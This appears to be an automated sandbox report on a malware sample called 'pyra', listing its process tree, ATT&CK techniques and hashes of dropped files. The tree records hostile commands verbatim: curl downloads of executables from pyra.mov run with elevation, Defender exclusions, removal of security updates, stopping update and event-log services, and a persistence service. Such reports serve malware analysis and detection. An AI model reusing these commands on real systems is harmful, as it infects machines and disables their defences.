- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5244,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5908 /prefetch:8
  2⤵
  PID:3248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5924,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  PID:4424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5436,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5152 /prefetch:8
  2⤵
  PID:3432

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4444

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3540

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\pyra\" -ad -an -ai#7zMap28696:70:7zEvent27956
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4944

C:\Users\Admin\Downloads\pyra\pyra\Pyra.exe
"C:\Users\Admin\Downloads\pyra\pyra\Pyra.exe"
1⤵
- Executes dropped EXE
PID:2064
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\Downloads\pyra\pyra\data\data.bat
  2⤵
  PID:3116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\DOWNLO~1\pyra\pyra\data\data.bat h' -WindowStyle Hidden"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1456
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\DOWNLO~1\pyra\pyra\data\data.bat h
      4⤵
      PID:1132
    - - C:\Windows\system32\net.exe
        
        NET SESSION
        5⤵
        
        PID:3808
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 SESSION
        6⤵
        
        PID:2496
    - - C:\Windows\system32\where.exe
        
        where curl
        5⤵
        
        PID:1572
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Local\file1.exe" "https://pyra.mov/test/test1" --silent --show-error
        5⤵
        Downloads MZ/PE file
        
        PID:3816
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Local\file2.exe" "https://pyra.mov/test/test2" --silent --show-error
        5⤵
        Downloads MZ/PE file
        
        PID:780
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:1428
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:1552
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:4452
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:4652
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:3648
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:1188
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:1600
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:2696
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:2484
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:1528
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:3192
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:2564
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:2096
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:4400
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:1252
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:4304
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:1808
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:564
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:2004
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:3540
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:2060
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:3236
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:392
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:3788
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:4132
    - - C:\Windows\system32\icacls.exe
        
        icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
        5⤵
        Modifies file permissions
        
        PID:4216
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:1656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file1.exe' -Verb RunAs"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2824
      - C:\Users\Admin\AppData\Local\file1.exe
        
        "C:\Users\Admin\AppData\Local\file1.exe"
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2544
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:4928
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:3380
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:2404
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:2688
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:4496
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:4872
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:4116
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        
        PID:1600
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        
        PID:952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1676
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        
        PID:4728
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        
        PID:2096
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "BUZZLBYC"
        7⤵
        Launches sc.exe
        
        PID:5008
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "BUZZLBYC" binpath= "C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:4216
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:5076
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "BUZZLBYC"
        7⤵
        Launches sc.exe
        
        PID:2052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file2.exe' -Verb RunAs"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4116
      - C:\Users\Admin\AppData\Local\file2.exe
        
        "C:\Users\Admin\AppData\Local\file2.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3452
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\file2.exe
        7⤵
        Views/modifies file attributes
        
        PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
1⤵
PID:3236
- C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Executes dropped EXE
  PID:4456
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
    3⤵
    - Views/modifies file attributes
    PID:2896

C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe
C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2112
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:60
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2480
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3164
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:648
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4288
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:660
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3192
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3540
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2828
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3452
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1600
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1676
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4564
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
788f7adc049ce32858dcb318b055c2bd

SHA1
cd32dd2ab365693e6448c385f801b1fbcccac325

SHA256
6c2e55de91e994c51c1feb2ba440fc84ee374f232141e2a5d5f7c7eae6dc8a6e

SHA512
5f0edfbb1e787202f283538ae58b255b78f47d3ff6cd74cdeebfe46229ffc573d1b35b305db64e3ea191668695a97e24588d3d8e0f5e758862fc242abb95534b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
1d50c7b39c5027205c431f728abfa1df

SHA1
fb96a846e1b9be73be4a999316fb36e86f5faec7

SHA256
a1200be7ccc7063668d689d6eebc3b48c68078707577bc47221d5579a4c43a9c

SHA512
5cdbd9445bff6e68e7c3f13305b593f26680629d15b052bb8d9359f1f789c4791ab1e059c08ce8a3e7696a932df6fd1ce42c33e087e0258852a16bdf5bd95519

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
a16aca8a4eeaebd70a2d10b952d7bc13

SHA1
4878b0f7caabf2cd174344a2518e89dad7992fd8

SHA256
018857fb4924c669fc1760277bf737aabcd758321e55f6da14701645266b906c

SHA512
f27cdcd58ef9aa75026b3bca8f92d2182e67efa31f672e5632fa5842c449b76b22ae4bf793daf7e6834fad50ca6ece37ea1c965563a96b3a8f53dd5c8fb52c21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
b26199cf513fbabc8741485f44a6b6c0

SHA1
ba418d13e62cf65e5ec2c8aec41689d2bcaf114b

SHA256
b338d9c4441cdd89076faad8e44127fdb897d6e483fadc61620de433590efdee

SHA512
66765a5eb9e754fd7fd6958dbf2c8bc151835705f691c09aab6cba157f077301c6c5f90b396c74ab1ff403ce7966872fe1f06de9258ba1cd867b06b18179ca8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
1a4c16141514475b2a84b7b0c3e6d12b

SHA1
1e23dbff24f1970abe145bbe0fda00b688af648f

SHA256
06be540710a68056b60cb77d93e26e566e44b1ca1b4fa110095a2ec9aa3b5571

SHA512
0b26f348e727536068ff7a39a1c6f77e84f93b3a587fe121875453c1b0723731acda948effc414f1b1844fbc446ac2ab17690ff874eb03939f3aa697fa5270bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
4050df23915382523edcf3ed95f7c3cf

SHA1
e6e4878513e06a30d308f82fd0f6b202b6f77ade

SHA256
e6b1e88736a08cf75dfedb18141934314fb05ceeb05f94326566d3d363342c51

SHA512
ba2d85e86c599f0aabd8af34ad2b13236f8ee900b41c3680c170339cc6fe398ce754ea46438f761b87cac7ee7d86beda39cab6a5eb19bb2535d330467809d30f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57edcb.TMP

Filesize
48B

MD5
ee38f4e586993ea1c870de6fe3e4b689

SHA1
f137b3c29a2bf6f1e6255774182a30600e3f90b9

SHA256
a975a4da2a6ccd7d845e3dfd7f42d9a18eca7701754c1c2f62d2289242cb1026

SHA512
6553137d894beccfbdfa0c2dccedb88f83dd79fd1a718844aa0b85f33f7e57f1ab39e7455760fc76255117d8fdaa1b433caef0e203cf05a7b3ff304fd43fbc58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
548387398f65cb6c4d0c963a4085a64d

SHA1
4ff1874b540f4c0faae2a571033bb234fc3e74c0

SHA256
dda9ecee515409a42af6378784bb5c86511d44a18342383bb70166c26aab0008

SHA512
6e87ee71831e09c6a1a79b3526e954391a4da57b661c7b374da39fdfa31938daabd6e40b507511550e47092b2a687060192a59238822ed5d5306e7b7b3d374c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
ad36649281df8d26e6a4450e2a9e4134

SHA1
af702eb45963cefbcaf5280492cf14609c0227cd

SHA256
5f48c660ff1ff2bbad86e4770db409a5b1eb42a800e797e3c870e875b452001e

SHA512
04c45c942c58ce7b1779bed83a988cef5ec2e7516b30bb85fa82c1be92302f768943fdbbc3c74636cb8a93735bd9a48c799414dd9720dbc83e9b211ccfabc6d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
d7313294775255993d15a7fc8f553fe1

SHA1
2591d46deaf76a047414a32fecd6cc87be53d234

SHA256
e9ada6b3c58ce3a759b6ca85d3dc9bd1351f7bbc21b925ddfe83d52d20ff5927

SHA512
c003b84ea3c8a7d2ac1361bc69037adc3231f40ae18c3e2127160877ecb2f760d2eb2f83ff7f8878fe4e4fc4ddee9fcc3863a61e368c82d0e49631c71677068c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
713ad359b75fe6d947468ec1825202b9

SHA1
19dcd19f18a2ad6deb581451aad724bd44a592a4

SHA256
56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

SHA512
4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
34b159616f80c1d5893cf406775bad4e

SHA1
dff5f71c17b07b8549b36e1c768db925205e1b4f

SHA256
120aeb6d51d942abd453d508b7bfd606aff0c798e588ca2e18b23d5a993820ad

SHA512
3694b353483d4297944cf8d0ecfba7ed832d94dc25dd7012c7d6b4415b5bfcc90d72b468f3cf3a038f3936d5b56ee14622677eb069a3a29933cb18ee447bb82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwq50p2x.v1z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\file1.exe

Filesize
2.5MB

MD5
514e00d37d15901490a4974d59e63c96

SHA1
80575034e11501ad1fff1ad865234d109cbc6a16

SHA256
51371a9eb105df4a666f224347e377bc294358ad022d3c4a739fe3f65e09637d

SHA512
e55508411a803333cb67bb12a8b6f76b9f627a94de87263ba44e59e00e70722b938b3de5fc14bcd5d37871bbf760751ba973454eb077efdaae0a26b96138c255

Download Submit
C:\Users\Admin\AppData\Local\file2.exe

Filesize
9.3MB

MD5
a8133dab079ce24c46a35749109d8f34

SHA1
455ac75b069b855bd3785a0f56d69276b8e83b01

SHA256
c8c36f079915be17e2c725b4247ceca4269e42fa6712f59d90147b103d60251e

SHA512
a57ecbda300a2a92c034177bf70cf441606ae9a68e1d0ec1be032921cea44d5fdfde23c5dfcf10dcc9b97a518b0a31d752fb24b344a5f80c30aa3e20e429ec06

Download Submit
C:\Users\Admin\Downloads\pyra.zip.crdownload

Filesize
120KB

MD5
7b0fc893480f207b449ac1808364ce50

SHA1
268bba521fadd969b32a63a0987b98e3d2455dd6

SHA256
007772a6d9c5b76d61a2408e948b24b0ae10c00435a1d74d935c162a88ca4008

SHA512
110d1cd312e1bbdd9c17f32af6a1a9ccbd8a2aefe7109cf3251bf976f7ef67c714a1b87f9b36d19bba815af59fa80ce9e5e412b344f2d70ff068f40b47f672a1

Download Submit
C:\Users\Admin\Downloads\pyra\pyra\Pyra.exe

Filesize
257KB

MD5
7a5e41ba12a894b44fb1a1624eb3e899

SHA1
c7e7321eaa462eab2c900003577de57ee4a1bc0a

SHA256
f5c969927a6ccabd7e29d659b1e0f28730fbe0e3c87063b194f8cc46b0c340df

SHA512
4b321938b3cc66fb344eb63c3482abc0fa896b52341c5614c93a5ae3efc14fb073fb0084a5fcd02e095976463c39a6a3c3a6027dc7f8297deee2b4ce31aaeb14

Download Submit
C:\Users\Admin\Downloads\pyra\pyra\data\data.bat

Filesize
2KB

MD5
cf53469fbe70862f8395e48088f5dc39

SHA1
2c0061116ec9d52689a27930c22dafcb26a89f71

SHA256
1dcdbb2c5ca99456ae680c7777226caa09b1cab8be979c69729a1c307d7b6806

SHA512
c0900865407b40f98f873043978e0bd162fd81e36f163110565683a8bcf0ea16204bdfd26cf1216ce395bc2b002737a84ee8669ddd0cc4e226b778a70e7f8fe2

Download Submit
memory/60-196-0x00000196B41C0000-0x00000196B41CA000-memory.dmp

Filesize
40KB

Download
memory/60-195-0x00000196B4100000-0x00000196B41B5000-memory.dmp

Filesize
724KB

Download
memory/60-194-0x00000196B40E0000-0x00000196B40FC000-memory.dmp

Filesize
112KB

Download
memory/1456-105-0x00000153A9DA0000-0x00000153A9DC2000-memory.dmp

Filesize
136KB

Download
memory/2004-215-0x0000000000A50000-0x0000000000A70000-memory.dmp

Filesize
128KB

Download
memory/2004-211-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-212-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-214-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-218-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-219-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-220-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-217-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-216-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-263-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-213-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-209-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-208-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-210-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/2004-262-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/4564-202-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4564-201-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4564-204-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4564-200-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4564-203-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4564-206-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download